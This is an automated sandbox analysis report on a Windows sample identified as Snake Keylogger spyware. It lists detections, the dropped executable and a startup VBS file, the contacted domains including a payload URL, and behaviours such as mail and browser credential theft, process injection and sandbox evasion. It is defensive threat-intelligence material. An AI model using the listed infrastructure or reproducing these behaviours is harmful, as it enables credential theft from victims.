                      Virtualization/Sandbox Evasion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Process Injection                      		Proc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562379 Sample: LAQfpnQvPQ.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 cia.tf 2->32 34 2 other IPs or domains 2->34 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Multi AV Scanner detection for submitted file 2->54 58 9 other signatures 2->58 8 LAQfpnQvPQ.exe 15 5 2->8         started        13 wscript.exe 1 2->13         started        signatures3 56 Tries to detect the country of the analysis system (by using the IP) 30->56 process4 dnsIp5 36 cia.tf 104.21.1.182, 443, 49710, 49746 CLOUDFLARENETUS United States 8->36 24 C:\Users\user\AppData\Roaming\ishon.exe, PE32 8->24 dropped 26 C:\Users\user\...\ishon.exe:Zone.Identifier, ASCII 8->26 dropped 28 C:\Users\user\AppData\Roaming\...\ishon.vbs, ASCII 8->28 dropped 64 Drops VBS files to the startup folder 8->64 66 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->66 68 Injects a PE file into a foreign processes 8->68 15 LAQfpnQvPQ.exe 2 8->15         started        70 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->70 19 ishon.exe 14 2 13->19         started        file6 signatures7 process8 dnsIp9 38 checkip.dyndns.com 193.122.130.0, 49712, 49727, 49738 ORACLE-BMC-31898US United States 15->38 40 reallyfreegeoip.org 172.67.177.134, 443, 49716, 49724 CLOUDFLARENETUS United States 15->40 42 Tries to steal Mail credentials (via file / registry access) 15->42 44 Multi AV Scanner detection for dropped file 19->44 46 Machine Learning detection for dropped file 19->46 48 Injects a PE file into a foreign processes 19->48 21 ishon.exe 2 19->21         started        signatures10 process11 signatures12 60 Tries to steal Mail credentials (via file / registry access) 21->60 62 Tries to harvest and steal browser information (history, passwords, etc) 21->62

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      LAQfpnQvPQ.exe55%ReversingLabsWin32.Spyware.Snakekeylogger
                      LAQfpnQvPQ.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\ishon.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\ishon.exe55%ReversingLabsWin32.Spyware.Snakekeylogger

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://cia.tf/12e2f2f2315804d08baebc78b9269ad1.mp30%Avira URL Cloudsafe
                      https://cia.tf/12e2f2f2315804d08baebc78b9269ad1.mp3HI.0%Avira URL Cloudsafe
                      https://cia.tf0%Avira URL Cloudsafe
                      https://cia.tf/12e2f2f2315804d08baebc78b9269ad1.mp3HIC0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      cia.tf
                      		104.21.1.182
                      		truefalse
                        		high
                        reallyfreegeoip.org
                        		172.67.177.134
                        		truefalse
                          		high
                          checkip.dyndns.com
                          		193.122.130.0
                          		truefalse
                            		high
                            checkip.dyndns.org
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://cia.tf/12e2f2f2315804d08baebc78b9269ad1.mp3false
                              • Avira URL Cloud: safe
                              		unknown
                              https://reallyfreegeoip.org/xml/8.46.123.75false
                                		high
                                http://checkip.dyndns.org/false
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://sectigo.com/CPS0LAQfpnQvPQ.exe, ishon.exe.0.drfalse
                                    		high
                                    https://stackoverflow.com/q/14436606/23354LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2219471547.000000000320E000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2504335246.000000000326E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/mgravell/protobuf-netJLAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2515782521.000000000446B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://ocsp.sectigo.com0LAQfpnQvPQ.exe, ishon.exe.0.drfalse
                                          		high
                                          https://github.com/mgravell/protobuf-netLAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://cia.tfLAQfpnQvPQ.exe, 00000000.00000002.2219471547.0000000003161000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2504335246.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cia.tf/12e2f2f2315804d08baebc78b9269ad1.mp3HI.ishon.exe, 00000005.00000002.2504335246.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://checkip.dyndns.orgLAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000307C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003089000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003097000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003028000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000311D000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000310F000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000313C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003097000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003054000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003048000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tLAQfpnQvPQ.exe, ishon.exe.0.drfalse
                                                		high
                                                https://github.com/mgravell/protobuf-netiLAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://cia.tf/12e2f2f2315804d08baebc78b9269ad1.mp3HICLAQfpnQvPQ.exe, 00000000.00000002.2219471547.0000000003161000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://crl.microishon.exe, 00000007.00000002.3324129689.0000000006720000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://reallyfreegeoip.org/xml/8.46.123.75$LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000307C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003089000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003097000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003028000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000310F000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000313C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003097000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://stackoverflow.com/q/11564914/23354;LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://stackoverflow.com/q/2152978/23354LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#LAQfpnQvPQ.exe, ishon.exe.0.drfalse
                                                            		high
                                                            http://checkip.dyndns.org/qLAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://reallyfreegeoip.orgLAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000307C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003002000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003089000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003097000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000310F000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000313C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000306C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://reallyfreegeoip.orgLAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000307C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003089000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003097000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003028000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000310F000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000313C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003097000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003054000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://checkip.dyndns.comLAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000307C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003089000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003097000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000310F000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000313C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003054000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameLAQfpnQvPQ.exe, 00000000.00000002.2219471547.0000000003161000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2504335246.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000002F91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://reallyfreegeoip.org/xml/LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003054000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        104.21.1.182
                                                                        		cia.tfUnited States
                                                                        		13335CLOUDFLARENETUSfalse
                                                                        193.122.130.0
                                                                        		checkip.dyndns.comUnited States
                                                                        		31898ORACLE-BMC-31898USfalse
                                                                        172.67.177.134
                                                                        		reallyfreegeoip.orgUnited States
                                                                        		13335CLOUDFLARENETUSfalse

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1562379
                                                                        Start date and time:2024-11-25 14:58:08 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 7m 53s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:8
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:LAQfpnQvPQ.exe
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:b5d25a995424fd4d4fe5303ca4e90ceeb2794989f58213bda32b29c8716c5cfb.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 50%
                                                                        HCA Information:
                                                                        • Successful, ratio: 97%
                                                                        • Number of executed functions: 429
                                                                        • Number of non-executed functions: 36
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target LAQfpnQvPQ.exe, PID 6364 because it is empty
                                                                        • Execution Graph export aborted for target ishon.exe, PID 6184 because it is empty
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: LAQfpnQvPQ.exe

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        08:59:00API Interceptor1710733x Sleep call for process: LAQfpnQvPQ.exe modified
                                                                        08:59:30API Interceptor88827x Sleep call for process: ishon.exe modified
                                                                        14:59:20AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        193.122.130.0November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        SOA SEP 2024.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                        • checkip.dyndns.org/
                                                                        Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • checkip.dyndns.org/

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        cia.tfidk_1.ps1Get hashmaliciousUnknownBrowse
                                                                        • 172.67.129.178
                                                                        FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                                                        • 172.67.129.178
                                                                        Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                        • 172.67.129.178
                                                                        checkip.dyndns.comNovember Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 193.122.130.0
                                                                        #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.6.168
                                                                        F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 158.101.44.242
                                                                        dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 132.226.8.169
                                                                        AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                        • 132.226.247.73
                                                                        denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 193.122.6.168
                                                                        VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 132.226.8.169
                                                                        IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 193.122.6.168
                                                                        reallyfreegeoip.orgNovember Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 172.67.177.134
                                                                        #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.67.152
                                                                        F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 172.67.177.134
                                                                        dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                        • 104.21.67.152
                                                                        denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.67.152
                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 172.67.177.134
                                                                        VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.67.152
                                                                        order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 104.21.67.152
                                                                        IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 172.67.177.134

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSidk_1.ps1Get hashmaliciousUnknownBrowse
                                                                        • 172.67.129.178
                                                                        FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                                                        • 172.67.129.178
                                                                        Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                        • 104.26.13.205
                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                        • 172.64.41.3
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.155.47
                                                                        PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                        • 104.26.13.205
                                                                        0Xp3q1l7De.exeGet hashmaliciousRemcosBrowse
                                                                        • 172.64.41.3
                                                                        DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • 104.21.24.198
                                                                        CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 104.26.12.205
                                                                        New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.74.152
                                                                        ORACLE-BMC-31898USla.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                        • 193.123.91.33
                                                                        November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 193.122.130.0
                                                                        #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.6.168
                                                                        F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 158.101.44.242
                                                                        denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 193.122.6.168
                                                                        VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 193.122.6.168
                                                                        Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 158.101.44.242
                                                                        Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.130.0

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
